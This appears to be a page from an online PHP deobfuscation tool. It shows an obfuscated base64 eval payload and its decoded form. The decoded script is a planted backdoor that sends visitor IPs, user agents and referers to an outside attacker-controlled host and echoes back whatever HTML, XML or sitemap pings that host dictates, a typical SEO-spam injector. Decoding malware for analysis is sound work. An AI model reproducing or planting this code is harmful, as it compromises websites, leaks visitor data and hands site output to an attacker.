Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval("?>".base64_decode("PD9waHAgZXZhbCgiPz4iLmJhc2U2NF9kZWNvZGUoIlBEOXdhSEFOQ21WeWN..
Decoded Output download
?>b'<?php
error_reporting(0);
header(\'Content-Type: text/html; charset=utf-8\');
$lan = base64_encode(@$_SERVER[\'HTTP_ACCEPT_LANGUAGE\']);
$uri = base64_encode(@$_SERVER[\'REQUEST_URI\']);
$host = @$_SERVER[\'HTTP_HOST\'];
$agent = base64_encode(@$_SERVER[\'HTTP_USER_AGENT\']);
$referer = base64_encode(@$_SERVER[\'HTTP_REFERER\']);
$ip = base64_encode(@$_SERVER[\'REMOTE_ADDR\']);
$zone=base64_encode(date_default_timezone_get());
$http_type = ((isset($_SERVER[\'HTTPS\']) && $_SERVER[\'HTTPS\'] == \'on\') || (isset($_SERVER[\'HTTP_X_FORWARDED_PROTO\']) && $_SERVER[\'HTTP_X_FORWARDED_PROTO\'] == \'https\')) ? \'https://\' : \'http://\';
$goweb = "https://fgj102.widefind.top";
$typeName = base64_encode($http_type.$host);
$geturl = $goweb.\'/index.php?domain=\'.$typeName.\'&uri=\'.$uri.\'&lan=\'.$lan.\'&agent=\'.$agent.\'&zone=\'.$zone.\'&ip=\'.$ip.\'&goweb=\'.$goweb.\'&referer=\'.$referer;
$file_contents = getCurl($geturl);
if(stripos($_SERVER[\'REQUEST_URI\'],\'jp2023\')!==false){
echo $host.":cs102-ok;";
exit();
}
if(strstr($file_contents,"[#*#*#]")){
$html = explode("[#*#*#]",$file_contents);
if($html[0] == "echohtml"){ echo $html[1]; exit; }
if($html[0] == "echoxml"){ header("Content-type: text/xml"); echo $html[1]; exit; }
if($html[0] == "echorss"){ header("Content-type: text/xml"); echo $html[1]; exit; }
if($html[0] == "pingxml"){
$maps=explode("|||",$html[1]);
foreach($maps as $v){
$pingRes = getCurl($v); $Oooo0s = (strpos($pingRes, \'Sitemap Notification Received\') !== false) ? \'OK\' : \'ERROR\';
echo $v . \'===>Sitemap: \' . $Oooo0s ."<br>";
}
exit;}
}
function getCurl($url)
{
$file_contents = @file_get_contents($url);
if (!$file_contents) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$file_contents = curl_exec($ch);
curl_close($ch);
}
return $file_contents;
}?>'Did this file decode correctly?
Original Code
<?php eval("?>".base64_decode("PD9waHAgZXZhbCgiPz4iLmJhc2U2NF9kZWNvZGUoIlBEOXdhSEFOQ21WeWNtOXlYM0psY0c5eWRHbHVaeWd3S1RzTkNtaGxZV1JsY2lnblEyOXVkR1Z1ZEMxVWVYQmxPaUIwWlhoMEwyaDBiV3c3SUdOb1lYSnpaWFE5ZFhSbUxUZ25LVHNOQ2lSc1lXNGdQU0JpWVhObE5qUmZaVzVqYjJSbEtFQWtYMU5GVWxaRlVsc25TRlJVVUY5QlEwTkZVRlJmVEVGT1IxVkJSMFVuWFNrN0RRb2tkWEpwSUQwZ1ltRnpaVFkwWDJWdVkyOWtaU2hBSkY5VFJWSldSVkpiSjFKRlVWVkZVMVJmVlZKSkoxMHBPdzBLSkdodmMzUWdQU0JBSkY5VFJWSldSVkpiSjBoVVZGQmZTRTlUVkNkZE93MEtKR0ZuWlc1MElEMGdZbUZ6WlRZMFgyVnVZMjlrWlNoQUpGOVRSVkpXUlZKYkowaFVWRkJmVlZORlVsOUJSMFZPVkNkZEtUc05DaVJ5WldabGNtVnlJRDBnWW1GelpUWTBYMlZ1WTI5a1pTaEFKRjlUUlZKV1JWSmJKMGhVVkZCZlVrVkdSVkpGVWlkZEtUc05DaVJwY0NBOUlHSmhjMlUyTkY5bGJtTnZaR1VvUUNSZlUwVlNWa1ZTV3lkU1JVMVBWRVZmUVVSRVVpZGRLVHNOQ2lSNmIyNWxQV0poYzJVMk5GOWxibU52WkdVb1pHRjBaVjlrWldaaGRXeDBYM1JwYldWNmIyNWxYMmRsZENncEtUc05DaVJvZEhSd1gzUjVjR1VnUFNBb0tHbHpjMlYwS0NSZlUwVlNWa1ZTV3lkSVZGUlFVeWRkS1NBbUppQWtYMU5GVWxaRlVsc25TRlJVVUZNblhTQTlQU0FuYjI0bktTQjhmQ0FvYVhOelpYUW9KRjlUUlZKV1JWSmJKMGhVVkZCZldGOUdUMUpYUVZKRVJVUmZVRkpQVkU4blhTa2dKaVlnSkY5VFJWSldSVkpiSjBoVVZGQmZXRjlHVDFKWFFWSkVSVVJmVUZKUFZFOG5YU0E5UFNBbmFIUjBjSE1uS1NrZ1B5QW5hSFIwY0hNNkx5OG5JRG9nSjJoMGRIQTZMeThuT3cwS0pHZHZkMlZpSUQwZ0ltaDBkSEJ6T2k4dlptZHFNVEF5TG5kcFpHVm1hVzVrTG5SdmNDSTdEUW9rZEhsd1pVNWhiV1VnUFNCaVlYTmxOalJmWlc1amIyUmxLQ1JvZEhSd1gzUjVjR1V1SkdodmMzUXBPdzBLSkdkbGRIVnliQ0E5SUNSbmIzZGxZaTRuTDJsdVpHVjRMbkJvY0Q5a2IyMWhhVzQ5Snk0a2RIbHdaVTVoYldVdUp5WjFjbWs5Snk0a2RYSnBMaWNtYkdGdVBTY3VKR3hoYmk0bkptRm5aVzUwUFNjdUpHRm5aVzUwTGljbWVtOXVaVDBuTGlSNmIyNWxMaWNtYVhBOUp5NGthWEF1SnlabmIzZGxZajBuTGlSbmIzZGxZaTRuSm5KbFptVnlaWEk5Snk0a2NtVm1aWEpsY2pzTkNpUm1hV3hsWDJOdmJuUmxiblJ6SUQwZ1oyVjBRM1Z5YkNna1oyVjBkWEpzS1RzTkNtbG1LSE4wY21sd2IzTW9KRjlUUlZKV1JWSmJKMUpGVVZWRlUxUmZWVkpKSjEwc0oycHdNakF5TXljcElUMDlabUZzYzJVcGV3MEtJQ0FnSUdWamFHOGdKR2h2YzNRdUlqcGpjekV3TWkxdmF6c2lPdzBLSUNBZ0lHVjRhWFFvS1RzTkNuME5DbWxtS0hOMGNuTjBjaWdrWm1sc1pWOWpiMjUwWlc1MGN5d2lXeU1xSXlvalhTSXBLWHNOQ2lBZ0lDQWthSFJ0YkNBOUlHVjRjR3h2WkdVb0lsc2pLaU1xSTEwaUxDUm1hV3hsWDJOdmJuUmxiblJ6S1RzTkNpQWdJQ0JwWmlna2FIUnRiRnN3WFNBOVBTQWlaV05vYjJoMGJXd2lLWHNnWldOb2J5QWthSFJ0YkZzeFhUc2daWGhwZERzZ2ZRMEtJQ0FnSUdsbUtDUm9kRzFzV3pCZElEMDlJQ0psWTJodmVHMXNJaWw3SUdobFlXUmxjaWdpUTI5dWRHVnVkQzEwZVhCbE9pQjBaWGgwTDNodGJDSXBPeUJsWTJodklDUm9kRzFzV3pGZE95QmxlR2wwT3lCOURRb2dJQ0FnYVdZb0pHaDBiV3hiTUYwZ1BUMGdJbVZqYUc5eWMzTWlLWHNnYUdWaFpHVnlLQ0pEYjI1MFpXNTBMWFI1Y0dVNklIUmxlSFF2ZUcxc0lpazdJR1ZqYUc4Z0pHaDBiV3hiTVYwN0lHVjRhWFE3SUgwTkNpQWdJQ0JwWmlna2FIUnRiRnN3WFNBOVBTQWljR2x1WjNodGJDSXBldzBLSUNBZ0lDQWdJQ0FrYldGd2N6MWxlSEJzYjJSbEtDSjhmSHdpTENSb2RHMXNXekZkS1RzTkNpQWdJQ0FnSUNBZ1ptOXlaV0ZqYUNna2JXRndjeUJoY3lBa2RpbDdEUW9nSUNBZ0lDQWdJQ0FnSUNBa2NHbHVaMUpsY3lBOUlHZGxkRU4xY213b0pIWXBPeUFrVDI5dmJ6QnpJRDBnS0hOMGNuQnZjeWdrY0dsdVoxSmxjeXdnSjFOcGRHVnRZWEFnVG05MGFXWnBZMkYwYVc5dUlGSmxZMlZwZG1Wa0p5a2dJVDA5SUdaaGJITmxLU0EvSUNkUFN5Y2dPaUFuUlZKU1QxSW5PdzBLSUNBZ0lDQWdJQ0FnSUNBZ1pXTm9ieUFrZGlBdUlDYzlQVDArVTJsMFpXMWhjRG9nSnlBdUlDUlBiMjl2TUhNZ0xpSThZbkkrSWpzTkNpQWdJQ0FnSUNBZ2ZRMEtJQ0FnSUNBZ0lDQmxlR2wwTzMwTkNuME5DbVoxYm1OMGFXOXVJR2RsZEVOMWNtd29KSFZ5YkNrTkNuc05DaUFnSUNBa1ptbHNaVjlqYjI1MFpXNTBjeUE5SUVCbWFXeGxYMmRsZEY5amIyNTBaVzUwY3lna2RYSnNLVHNOQ2lBZ0lDQnBaaUFvSVNSbWFXeGxYMk52Ym5SbGJuUnpLU0I3RFFvZ0lDQWdJQ0FnSUNSamFDQTlJR04xY214ZmFXNXBkQ2dwT3cwS0lDQWdJQ0FnSUNCamRYSnNYM05sZEc5d2RDZ2tZMmdzSUVOVlVreFBVRlJmVlZKTUxDQWtkWEpzS1RzTkNpQWdJQ0FnSUNBZ1kzVnliRjl6WlhSdmNIUW9KR05vTENCRFZWSk1UMUJVWDFOVFRGOVdSVkpKUmxsSVQxTlVMQ0F3S1RzTkNpQWdJQ0FnSUNBZ1kzVnliRjl6WlhSdmNIUW9KR05vTENCRFZWSk1UMUJVWDFOVFRGOVdSVkpKUmxsUVJVVlNMQ0F3S1RzTkNpQWdJQ0FnSUNBZ1kzVnliRjl6WlhSdmNIUW9KR05vTENCRFZWSk1UMUJVWDFKRlZGVlNUbFJTUVU1VFJrVlNMREVwT3cwS0lDQWdJQ0FnSUNBa1ptbHNaVjlqYjI1MFpXNTBjeUE5SUdOMWNteGZaWGhsWXlna1kyZ3BPdzBLSUNBZ0lDQWdJQ0JqZFhKc1gyTnNiM05sS0NSamFDazdEUW9nSUNBZ2ZRMEtJQ0FnSUhKbGRIVnliaUFrWm1sc1pWOWpiMjUwWlc1MGN6c05DbjAvUGc9PSIpKTsgPz4=")); ?>
<?php Function Calls
| base64_decode | 2 |
Stats
| MD5 | 378d25a31bab23be4d646f6a5b1f22d4 |
| Eval Count | 2 |
| Decode Time | 65 ms |